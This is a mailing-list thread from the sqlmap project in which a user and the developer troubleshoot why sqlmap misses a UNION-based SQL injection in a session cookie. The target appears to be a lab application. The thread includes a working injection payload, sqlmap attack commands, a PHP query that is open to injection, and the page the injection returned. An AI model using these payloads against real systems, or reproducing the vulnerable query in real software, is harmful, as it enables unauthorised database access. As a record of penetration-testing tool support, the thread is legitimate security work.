Re: [sqlmap-users] Simple failed injection
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Simple failed injection
|
From: Miroslav S. <mir...@gm...> - 2012-09-17 20:40:05
|
Hi Stephen.
There is really a problem here. Could you please update to the latest
revision and do the:
... --flush-session -t traffic.txt -v 3
and send back new session file. It seems that for some reason sqlmap is
doing only one type of boundaries in your case (skipping this simple: ') ...
Also, it would be great if you send a full console output of such clean run
(please, use -v 3).
Kind regards,
Miroslav Stampar
On Sun, Sep 16, 2012 at 9:33 PM, Stephen Shkardoon <ss...@ss...>wrote:
> Hi,
>
> This is the HTML from a manual request with sesh cookie set
> to ')%20UNION%20select%201,2,3,4%20--%20
>
> <html>
> <head>
> <link rel='stylesheet' href='css/styles.css'/>
> <title>My Account - Customer Care Centre - Acme Power Co</title>
> </head>
> <body>
>
> <div id='heading'>
> </div>
>
> <div id='menu'>
> <a href='index.php'>Home / Login</a> -
> <a href='account.php'>My Account</a> -
> <a href='support.php'>Contact Support</a> -
> <a href='#'
> onClick='javascript:window.open("hours.php?data=ccc","newwin","width=210,height=200")'>CCC
> Opening Hours</a> -
> <a href='logout.php'>Logout</a>;
> </div>
>
>
> <div id='content'>
> <div id='billz'>
> Hi, 2!<br><br> Have a token:
> 86a2aeef8813bfa37a354e8997c77388<br><br>Please find below your account
> statement, released 04 November 2011. This account is due to be paid on
> <b>05 November 2011</b>. Failure to pay this amount before the due date may
> result in service disruption.<br><br><h3>Account
> Statement</h3><hr><table><tr><td width=200>Account Number</td><td
> width=450>Description of
> Service</td><td>Amount</td></tr></table><hr><table><tr><td
> width=200>1</td><td width=450>Basic Power
> Service</td><td>4</td></tr></table>
> </div>
> </div>
>
> </body>
> </html>
>
> ---------------------------
>
> The relevant bits being "Hi, 2", and the table showing amount of "4" etc.
>
> Thanks,
> ss23
>
> On Mon, Sep 17, 2012 at 6:58 AM, Miroslav Stampar <
> mir...@gm...> wrote:
>
>> Hi Stephen.
>>
>> From this traffic file it's not really clear if this is exploitable by
>> any mean more than time-based.
>>
>> Could you please send the response you get when you "manually exploit" it
>> with the payload you've mentioned:
>> "sesh=')%20UNION%20select%201,2,3,4%20--%20" ?
>>
>> Kind regards,
>> Miroslav Stampar
>>
>>
>> On Sat, Sep 15, 2012 at 1:33 AM, Stephen Shkardoon <ss...@ss...>wrote:
>>
>>> It ran a little over and started testing User-Agent, but it has the
>>> entire log for the session cookie there.
>>> The options I used this time were:
>>> python2 sqlmap.py -u "http://10.100.0.26/account.php" --cookie="sesh=1"
>>> -t traffic.txt --level=5
>>>
>>> Thanks,
>>> ss23
>>>
>>>
>>> On Sat, Sep 15, 2012 at 10:31 AM, Miroslav Stampar <
>>> mir...@gm...> wrote:
>>>
>>>> Hi.
>>>>
>>>> In that case could you please send the sqlmap traffic file got by using
>>>> -t traffic.txt along with your standard switches/options?
>>>>
>>>> Kind regards,
>>>> Miroslav Stampar
>>>>
>>>>
>>>> On Sat, Sep 15, 2012 at 12:09 AM, Stephen Shkardoon <ss...@ss...>wrote:
>>>>
>>>>> Hi,
>>>>>
>>>>> Sorry, my mistake. I just copied the line and altered it to show that
>>>>> the cookie was being used. In the real script, there was no parse error.
>>>>> Nonetheless, sqlmap cannot pull out results.
>>>>>
>>>>> Thanks
>>>>> ss23
>>>>>
>>>>> On Sat, Sep 15, 2012 at 9:55 AM, Miroslav Stampar <
>>>>> mir...@gm...> wrote:
>>>>>
>>>>>> Hi.
>>>>>>
>>>>>> I am not sure how are you able to "definitely able to pull out
>>>>>> results" as as I can see the problem lies in used PHP (enclosed pair of
>>>>>> single quotes with another pair of single quotes):
>>>>>>
>>>>>> Bad:
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>>> sessionid = *'$_COOKIE['sesh']'*)");
>>>>>>
>>>>>> Good 1:
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>>> sessionid = *'$_COOKIE[sesh]'*)");
>>>>>>
>>>>>> Good 2:
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>>> sessionid = " . *$_COOKIE['sesh'] . "*)");
>>>>>>
>>>>>> With that code of yours you should get an ugly PHP error message:
>>>>>> "Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE,
>>>>>> expecting T_STRING or T_VARIABLE or T_NUM_STRING"
>>>>>>
>>>>>> Also, you could take a look at similar case here [1].
>>>>>>
>>>>>> Kind regards,
>>>>>> Miroslav Stampar
>>>>>>
>>>>>> [1]
>>>>>> http://www.hotscripts.com/forums/php/21179-php-parse-error-parse-error-unexpected-t_encapsed_and_whitespace-expecting-t_strin.html
>>>>>>
>>>>>> On Fri, Sep 14, 2012 at 8:08 PM, Stephen Shkardoon <ss...@ss...
>>>>>> > wrote:
>>>>>>
>>>>>>> Hi all,
>>>>>>>
>>>>>>> Trying to do a (simple) injection with sqlmap, and I can't seem to
>>>>>>> coax it into getting it right.
>>>>>>> The PHP source looks something like:
>>>>>>>
>>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>>>> sessionid = '$_COOKIE['sesh']')");
>>>>>>>
>>>>>>> and then it displays the fields it pulled out.
>>>>>>>
>>>>>>> The command(s) I've tried look something like ./sqlmap.py -u
>>>>>>> site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5
>>>>>>> --risk=5. However, the only injection point it finds is AND/OR time-based
>>>>>>> blind, which is horribly slow. Of course, manually, I can do a
>>>>>>> sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so
>>>>>>> I'm definitely able to pull out results.
>>>>>>>
>>>>>>> Anything I can do to push sqlmap in the right direction?
>>>>>>>
>>>>>>> Thanks,
>>>>>>> ss23
>>>>>>>
>>>>>>>
>>>>>>> ------------------------------------------------------------------------------
>>>>>>> Got visibility?
>>>>>>> Most devs has no idea what their production app looks like.
>>>>>>> Find out how fast your code is with AppDynamics Lite.
>>>>>>> http://ad.doubleclick.net/clk;262219671;13503038;y?
>>>>>>> http://info.appdynamics.com/FreeJavaPerformanceDownload.html
>>>>>>> _______________________________________________
>>>>>>> sqlmap-users mailing list
>>>>>>> sql...@li...
>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>>
>>>>>>>
>>>>>>
>>>>>>
>>>>>> --
>>>>>> Miroslav Stampar
>>>>>> http://about.me/stamparm
>>>>>>
>>>>>
>>>>>
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>>
>>>
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
--
Miroslav Stampar
http://about.me/stamparm
|
